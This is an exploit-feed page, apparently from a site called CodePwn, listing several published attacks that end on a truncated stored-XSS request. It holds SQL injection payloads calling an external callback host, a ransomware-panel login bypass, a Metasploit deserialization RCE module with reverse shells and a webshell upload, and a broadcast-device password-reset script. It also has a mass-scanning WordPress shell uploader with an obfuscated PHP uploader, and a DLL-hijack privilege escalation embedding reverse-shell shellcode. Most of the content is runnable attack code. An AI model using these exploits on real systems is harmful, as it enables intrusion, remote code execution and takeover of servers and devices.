Latest exploits :: CodePwn

<pre><code>## Title: hrm2024.1.0-Multiple-SQLi ## Author: nu11secur1ty ## Date: 04/02/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The cityedit parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+' was submitted in the cityedit parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: cityedit (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cityedit=22'+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'' RLIKE (SELECT (CASE WHEN (1759=1759) THEN 0x3232+(select load_file(0x5c5c5c5c726a6564686468666a3662336a3175736a30656f696978343376396f786b6c626f7a666d3561752e6f6173746966792e636f6d5c5c656969))+'' ELSE 0x28 END)) AND 'GMzs'='GMzs Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: cityedit=22'+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'' OR (SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT (ELT(8880=8880,1))),0x7178626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qJHK'='qJHK Type: time-based blind Title: MySQL > 5.0.12 AND time-based blind (heavy query) Payload: cityedit=22'+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'' AND 2124=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) AND 'Jtnd'='Jtnd --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/hrm-2024.1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/04/hrm202410-multiple-sqli.html) ## Time spent: 01:15:00 </code></pre>

<pre><code># Exploit Title: Jasmin Ransomware arbitrary file read # Date: 2024-04-04 # Exploit Author: @_chebuya # Software Link: https://github.com/codesiddhant/Jasmin-Ransomware # Version: v1.1 # Tested on: Ubuntu 20.04 LTS # CVE: CVE-2024-30851 # Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login # Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/main import requests import argparse import os from bs4 import BeautifulSoup def get_file(jasmin_url, filepath): response = requests.get( f'{jasmin_url}/download_file.php?file={filepath}', allow_redirects=False ) return response.text def get_keys(jasmin_url): headers = { 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', } data = "username=&password='+or+1%3D1+--+-&service=login" login_req = requests.post(f'{jasmin_url}/checklogin.php', headers=headers, data=data) cookies = login_req.cookies list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=cookies) soup = BeautifulSoup(list_req.text, 'html.parser') rows = soup.find_all('tr') print(f"Dumping decryption keys from {len(rows)-1} victims") for row in rows: data = row.find_all('td') if len(data) == 0: continue username = data[1].get_text() hostname = data[0].get_text() filepath = data[7].find('a')['href'].split("=")[1] print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}") parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel") subparser = parser.add_subparsers(dest='subcommand') file_parser = subparser.add_parser("getfile", help="Read a file off the server") file_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)") file_parser.add_argument("-f", "--file", default="c:/xampp/apache/logs/access.log", help="The file to read on the target server") # Default is the access log, deanonymize the operators! keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims") keys_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)") args = parser.parse_args() if args.subcommand != None: target_url = args.url.rstrip("/") if args.subcommand == "getkeys": get_keys(target_url) elif args.subcommand == "getfile": target_file = args.file.replace("\\", "/").replace("c:", "") target_path = os.path.join("../../../../../../../../../", target_file) print(get_file(target_url, target_path)) else: parser.print_help() </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Gibbon School Platform Authenticated PHP Deserialization Vulnerability', 'Description' => %q{ A Remote Code Execution vulnerability in Gibbon online school platform version 26.0.00 and lower allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a POST request to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`. As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands, potentially resulting in complete system compromise, data exfiltration, or unauthorized access to sensitive information. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor 'Ali Maharramli', # SecondX.io Research Team - discovery of the vulnerability 'Fikrat Guliev', # SecondX.io Research Team - discovery of the vulnerability 'Islam Rzayev' # SecondX.io Research Team - discovery of the vulnerability ], 'References' => [ ['CVE', '2024-24725'], ['URL', 'https://attackerkb.com/topics/ogKGAB44BP/cve-2024-24725'], ['PACKETSTORM', '177635'], ['EDB', '51903'] ], 'DisclosureDate' => '2024-03-18', 'Platform' => ['php', 'unix', 'linux', 'win'], 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86], 'Privileged' => false, 'Targets' => [ [ 'PHP', { 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Type' => :php, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } } ], [ 'Unix Command', { 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], [ 'Linux Dropper', { 'Platform' => ['linux'], 'Arch' => [ARCH_X64, ARCH_X86], 'Type' => :linux_dropper, 'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'], 'Linemax' => 16384, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ], [ 'Windows Command', { 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Type' => :windows_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp' } } ], [ 'Windows Dropper', { 'Platform' => 'win', 'Arch' => [ARCH_X64, ARCH_X86], 'Type' => :windows_dropper, 'Linemax' => 16384, 'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'], 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('TARGETURI', [ true, 'The Gibbon online school platform endpoint URL', '/' ]), OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]), OptString.new('USERNAME', [true, 'Gibbon username to login, typically an e-mail address']), OptString.new('PASSWORD', [true, 'Password']) ]) end def gibbon_login # construct multipart login form data form_data = Rex::MIME::Message.new form_data.add_part('', nil, nil, 'form-data; name="address"') form_data.add_part('default', nil, nil, 'form-data; name="method"') form_data.add_part(datastore['USERNAME'].to_s, nil, nil, 'form-data; name="username"') form_data.add_part(datastore['PASSWORD'].to_s, nil, nil, 'form-data; name="password"') form_data.add_part('025', nil, nil, 'form-data; name="gibbonSchoolYearID"') form_data.add_part('0002', nil, nil, 'form-data; name="gibboni18nID"') return send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php?timeout=true'), 'keep_cookies' => true, 'ctype' => "multipart/form-data; boundary=#{form_data.bound}", 'data' => form_data.to_s }) end def construct_form_data(payload) # construct multipart form data with payload payload_len = payload.length payload_data = "a:2:{i:7;O:32:\"Monolog\\Handler\\SyslogUdpHandler\":1:{s:9:\"\x00*\x00socket\";O:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"\x00*\x00handler\";r:3;s:13:\"\x00*\x00bufferSize\";i:-1;s:9:\"\x00*\x00buffer\";a:1:{i:0;a:2:{i:0;s:#{payload_len}:\"#{payload}\";s:5:\"level\";N;}}s:8:\"\x00*\x00level\";N;s:14:\"\x00*\x00initialized\";b:1;s:14:\"\x00*\x00bufferLimit\";i:-1;s:13:\"\x00*\x00processors\";a:2:{i:0;s:7:\"current\";i:1;s:6:\"system\";}}}i:7;i:7;}" form_data = Rex::MIME::Message.new form_data.add_part('/modules/System Admin/import_run.php', nil, nil, 'form-data; name="address"') form_data.add_part('sync', nil, nil, 'form-data; name="mode"') form_data.add_part('N', nil, nil, 'form-data; name="syncField"') form_data.add_part('', nil, nil, 'form-data; name="syncColumn"') form_data.add_part(payload_data.to_s, nil, nil, 'form-data; name="columnOrder"') form_data.add_part('N;', nil, nil, 'form-data; name="columnText"') form_data.add_part('%2C', nil, nil, 'form-data; name="fieldDelimiter"') form_data.add_part('%22', nil, nil, 'form-data; name="stringEnclosure"') form_data.add_part("#{Rex::Text.rand_text_alpha(8..16)}.xlsx", nil, nil, 'form-data; name="filename"') form_data.add_part('"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"', nil, nil, 'form-data; name="csvData"') form_data.add_part('1', nil, nil, 'form-data; name="ignoreErrors"') form_data.add_part('Submit', nil, nil, 'form-data; name="Failed"') return form_data end def upload_webshell(b64_payload) # randomize file name if option WEBSHELL is not set @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php") # create webshell with base64 encoded PHP payload # works for both windows and linux targets php_payload = "echo \"<?php @eval(base64_decode(\'#{b64_payload}\'));?>\" > #{@webshell_name}" form_data = construct_form_data(php_payload) # upload webshell send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'), 'keep_cookies' => true, 'ctype' => "multipart/form-data; boundary=#{form_data.bound}", 'data' => form_data.to_s }) end def execute_php(cmd, _opts = {}) payload = Base64.strict_encode64(cmd) res = upload_webshell(payload) fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200 register_file_for_cleanup(@webshell_name) # execute webshell send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, @webshell_name), 'keep_cookies' => true }) end def execute_command(cmd, _opts = {}) form_data = construct_form_data(cmd) send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'), 'keep_cookies' => true, 'ctype' => "multipart/form-data; boundary=#{form_data.bound}", 'data' => form_data.to_s }) end def check print_status("Checking if #{peer} can be exploited.") res = send_request_cgi!({ 'method' => 'GET', 'ctype' => 'application/x-www-form-urlencoded', 'uri' => normalize_uri(target_uri.path) }) return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 # check if target is running the Gibbon online school platform # search for the Gibbon version on the login page return CheckCode::Safe('No Gibbon school platform found.') unless res.body.include?('Gibbon') # trying to get the version version = res.body.match(/Gibbon.*v(\d+\.\d+\.\d+)/) version_number = version[0].split('v') unless version.nil? if version_number if Rex::Version.new(version_number[1]) <= Rex::Version.new('26.0.00') return CheckCode::Appears("Gibbon v#{version_number[1]}") else return CheckCode::Safe("Gibbon v#{version_number[1]}") end end CheckCode::Detected end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") res = gibbon_login fail_with(Failure::NoAccess, "Login failed with user #{datastore['USERNAME']} and password #{datastore['PASSWORD']}.") unless res && res.code == 302 case target['Type'] when :php execute_php(payload.encoded) when :unix_cmd, :windows_cmd execute_command(payload.encoded) when :linux_dropper, :windows_dropper # don't check the response here since the server won't respond # if the payload is successfully executed. execute_cmdstager({ linemax: target.opts['Linemax'] }) end end end </code></pre>

<pre><code>#!/usr/bin/env python # -*- coding: utf-8 -*- # # # Positron Broadcast Signal Processor TRA7005 v1.20 _Passwd Exploit # # # Vendor: Positron srl # Product web page: https://www.positron.it # https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/ # Affected version: 1.20 # TRA7K5_REV107 # TRA7K5_REV106 # TRA7K5_REV104 # TRA7K5_REV102 # # Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to # guarantee an excellent quality-price ratio in compliance with current regulations and # intended for individual broadcasters or radio networks. All models in the TRA7000 series # are fully digital, using only high-quality components such as 24-bit A/D and D/A converters # and 32-bit DSP. The TRA7005 performs the functions of Stereo Coder, RDS Coder, 5-output # MPX Distributor, AGC (adjustable) for both analogue and digital audio inputs, Clipper # for both analogue and digital audio inputs, change-over emergency switching between any # input with adjustable thresholds and intervention times, both in the switching phase on # the secondary source and in the return phase to the primary source. Ethernet connection # with Web-Server (optional) for total control and management of the device. Advanced BYPASS # system between MPX input and outputs, active on operating and power supply anomalies and # can also be activated remotely. # # Desc: The Positron Broadcast Digital Signal Processor TRA7005 suffers from an authentication # bypass through a direct and unauthorized access to the password management functionality. # The vulnerability allows attackers to bypass Digest authentication by manipulating the # password endpoint _Passwd.html and its payload data to set a user's password to arbitrary # value or remove it entirely. This grants unauthorized access to protected areas (/user, # /operator, /admin) of the application without requiring valid credentials, compromising # the device's system security. # # Tested on: Positron Web Server # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2024-5813 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5813.php # # # 22.03.2024 # # import requests,sys print(""" ______________________________________ ┏┳┓• ┏┓ ┓ ┏┓ ┓ • ┃ ┓┏┓┓┏ ┃┃┏┓┏┏┓┏┏┏┓┏┓┏┫ ┣ ┓┏┏┓┃┏┓┓╋ ┻ ┗┛┗┗┫ ┣┛┗┻┛┛┗┻┛┗┛┛ ┗┻ ┗┛┛┗┣┛┗┗┛┗┗ ┛ ┛ for Positron Digital Signal Processor ZSL-2024-5813 ______________________________________ """) if len(sys.argv) != 4: print("Usage: python positron.py <ip:port> <user/oper/admin> <erase/new_pwd>") sys.exit(1) ip = sys.argv[1] ut = sys.argv[2] wa = sys.argv[3] valid_ut = ['user', 'oper', 'admin'] if ut.lower() not in valid_ut: print("Invalid user type! Use 'user', 'oper', or 'admin'.") sys.exit(1) url = f'http://{ip}/_Passwd.html' did = f'http://{ip}/_Device.html' try: r = requests.get(did) if r.status_code == 200 and 'TRA7K5' in r.text: print("Vulnerable processor found!") else: print("Not Vulnerable or not applicable. Exploit exiting.") sys.exit(1) except requests.exceptions.RequestException as e: print(f"Error checking device: {e}") sys.exit(1) headers = { 'Content-Type' : 'application/x-www-form-urlencoded', 'Accept-Language': 'mk-MK,en;q=0.6', 'Accept-Encoding': 'gzip, deflate', 'User-Agent' : 'R-Marina/11.9', 'Accept' : '*/*' } payload = {} if wa.lower() == 'erase': payload[f'PSW_{ut.capitalize()}'] = 'NONE' else: payload_key = f'PSW_{ut.capitalize()}' payload[payload_key] = wa #print(payload) r = requests.post(url, headers=headers, data=payload) print(r.status_code) print(r.text) </code></pre>

<pre><code># Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated) # Date: 2024-02-25 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import sys , requests, re , json from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'} uploader = """ GIF89a <?php ?> <!DOCTYPE html> <html> <head> <title>Resultz</title> </head> <body><h1>Uploader</h1> <form enctype='multipart/form-data' action='' method='POST'> Uploaded <input type='file' name='uploaded_file'></input> <input type='submit' value='Upload'></input> </form> </body> </html> <?PHP if(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echo base64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echo base64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?> """ requests.urllib3.disable_warnings() def Exploit(Domain): try: if 'http' in Domain: Domain = Domain else: Domain = 'http://'+Domain myup = {'': ('db.php', uploader)} req = requests.post(Domain + '/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload', files=myup, headers=headers,verify=False, timeout=10).text req1 = requests.get(Domain + '/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php') if 'Ex3ptionaL' in req1: print (fg+'[+] '+ Domain + ' --> Shell Uploaded') open('Shellz.txt', 'a').write(Domain + '/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n') else: print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability') except: print(fr+' -| ' + Domain + ' --> {} [Failed]') target = open(input(fm+"Site List: "), "r").read().splitlines() mp = Pool(int(input(fm+"Threads: "))) mp.map(Exploit, target) mp.close() mp.join() </code></pre>

<pre><code># Title: SUPERAntiSpyware Professional X Version <=10.0.1264 "version.dll" Local Privilege Escalation # Date: 03.04.2024 # Author: M. Akil Gündoğan # Vendor Homepage: https://superantispyware.com/ # Version: 10.0.1262 and lastest version 10.0.1264 # Tested on: Windows 10 Professional x64 # PoC Video: https://youtu.be/FM5XlZPdvdo # CVE ID: CVE-2024-27518 # Vulnerability Description: -------------------------------------- SUPERAntiSpyware Professional X 10.0.1262 and 10.0.1264 is vulnerable to local privilege escalation because it allows unprivileged users to restore a malicious DLL from quarantine into the "C:\Program Files\SUPERAntiSpyware" folder via an NTFS directory junction, as demonstrated by a crafted version.dll file that is detected as malware. Since SASCore64.exe has a DLL Hijacking vulnerability for "version.dll", a shell is obtained as NT AUTHORITY\SYSTEM after system reboot. Technical details and step by step Proof of Concept's (PoC): 1 - A malicious version.dll file containing shellcode is created. 2 - If the generated shellcode containing "version.dll" is not already detected by SUPERAntiSpyware, it is combined with another malicious file in ".zip" with the command "copy /b version_created.dll + malicious.zip version.dll" to be detected as malicious. In this way, the created ".dll" file can be detected as malicious by SUPERAntiSpyware and quarantined. 3 - Create a new folder and copy the prepared "version.dll" into it. Then the folder is scanned and SUPERAntiSpyware quarantines the DLL. 4 - Using "CreateMountPoint.exe" among the "Symbolic Link Testing" tools provided by Google, the path where "version.dll" is quarantined is mounted in the "C:\Program Files\SUPERAntiSpyware" directory. These tools are available at the following link (https://github.com/googleprojectzero/symboliclink-testing-tools) or you can use the mklink command to do the same thing. 5 - When the quarantined "version.dll" is restored, it will be copied to SUPERAntiSpyware's directory. After the system reboots, SASCore64.exe will execute the shellcode in "version.dll" and open a session with NT AUTHORITY\SYSTEM privileges for the attacker. # Mitigations: -------------------------------------- We recommend uninstalling SUPERAntiSpyware until the vulnerability is fixed. # Timeline: -------------------------------------- - 18.02.2024 - Vulnerability reported via email but vendor refused to fix it. - 03.04.2024 - Full disclosure. # References -------------------------------------- - Vendor: https://www.superantispyware.com/ - CVE: https://www.cve.org/CVERecord?id=CVE-2024-27518 - Repository: https://github.com/secunnix/CVE-2024-27518/ # DLLMain: ------------------------------------------------------------------------------------------------------------------------- /* SUPERAntiSpyware LPE "version.dll" DLLMain.cpp M. Akil GUNDOGAN (0xr3act0r) - Secunnix Vulnerability Research Team Special Thanks: Safa Karakus and Samet Gozet If the generated shellcode containing "version.dll" is not already detected by SUPERAntiSpyware, it is combined with another malicious file in ".zip" with the command "copy /b version_created.dll + malicious.zip version.dll" to be detected as malicious. In this way, the created ".dll" file can be detected as malicious by SUPERAntiSpyware and quarantined. Compile as release x64 DLL. */ #include "windows.h" #include "ios" #include "fstream" #include <iostream> #pragma once #pragma comment(linker,"/export:GetFileVersionInfoA=c:\\windows\\system32\\version.GetFileVersionInfoA,@1") #pragma comment(linker,"/export:GetFileVersionInfoByHandle=c:\\windows\\system32\\version.GetFileVersionInfoByHandle,@2") #pragma comment(linker,"/export:GetFileVersionInfoExA=c:\\windows\\system32\\version.GetFileVersionInfoExA,@3") #pragma comment(linker,"/export:GetFileVersionInfoExW=c:\\windows\\system32\\version.GetFileVersionInfoExW,@4") #pragma comment(linker,"/export:GetFileVersionInfoSizeA=c:\\windows\\system32\\version.GetFileVersionInfoSizeA,@5") #pragma comment(linker,"/export:GetFileVersionInfoSizeExA=c:\\windows\\system32\\version.GetFileVersionInfoSizeExA,@6") #pragma comment(linker,"/export:GetFileVersionInfoSizeExW=c:\\windows\\system32\\version.GetFileVersionInfoSizeExW,@7") #pragma comment(linker,"/export:GetFileVersionInfoSizeW=c:\\windows\\system32\\version.GetFileVersionInfoSizeW,@8") #pragma comment(linker,"/export:GetFileVersionInfoW=c:\\windows\\system32\\version.GetFileVersionInfoW,@9") #pragma comment(linker,"/export:VerFindFileA=c:\\windows\\system32\\version.VerFindFileA,@10") #pragma comment(linker,"/export:VerFindFileW=c:\\windows\\system32\\version.VerFindFileW,@11") #pragma comment(linker,"/export:VerInstallFileA=c:\\windows\\system32\\version.VerInstallFileA,@12") #pragma comment(linker,"/export:VerInstallFileW=c:\\windows\\system32\\version.VerInstallFileW,@13") #pragma comment(linker,"/export:VerLanguageNameA=c:\\windows\\system32\\version.VerLanguageNameA,@14") #pragma comment(linker,"/export:VerLanguageNameW=c:\\windows\\system32\\version.VerLanguageNameW,@15") #pragma comment(linker,"/export:VerQueryValueA=c:\\windows\\system32\\version.VerQueryValueA,@16") #pragma comment(linker,"/export:VerQueryValueW=c:\\windows\\system32\\version.VerQueryValueW,@17") // Shellcode: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.109 LPORT=4444 -f c unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" "\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33" "\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00" "\x00\x49\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x01\x6d" "\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07" "\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29" "\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48" "\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea" "\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89" "\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81" "\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00" "\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0" "\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01" "\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41" "\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d" "\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48" "\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff" "\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5" "\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"; VOID shellcodeExecute() { ShowWindow(GetConsoleWindow(), SW_HIDE); HANDLE mem_handle = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, sizeof(shellcode), NULL); void* mem_map = MapViewOfFile(mem_handle, FILE_MAP_ALL_ACCESS | FILE_MAP_EXECUTE, 0x0, 0x0, sizeof(shellcode)); std::memcpy(mem_map, shellcode, sizeof(shellcode)); std::cout << ((int(*)())mem_map)() << std::endl; } BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: shellcodeExecute(); break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; case DLL_PROCESS_DETACH: break; } return TRUE; } </code></pre>

<pre><code># Exploit Title: Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS) # Date: 22 March 2024 # Exploit Author: Erdemstar # Vendor: https://wordpress.com/ # Version: 1.3.1 # Proof Of Concept: 1. Click Add New Watermark and enter the XSS payload into the Watermark Text. 2. Stored XSS will run on anyone who wants to edit this page. # Vulnerable Property: watermark_title # PoC Video: https://youtu.be/XEe0Sno6e2g?si=mcgO6VbAwymGXcCp # Request: POST /wp-admin/post.php HTTP/2 Host: erdemstar.local Cookie: wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7C50573cb574c70a41a241cb9f1f1e3ff22f539fc8630599f2503d02a6c1a7e678; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wp-settings-time-4=1711124335; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7Cdae14d9d9aa7f0c4df03783bb2bd321a5b3d6a63d8c3e1ae131dda689c595862; wp-settings-time-5=1711124723 Content-Length: 1460 Upgrade-Insecure-Requests: 1 Origin: https://erdemstar.local Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: https://erdemstar.local/wp-admin/post-new.php?post_type=watermark&wp-post-new-reload=true Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i 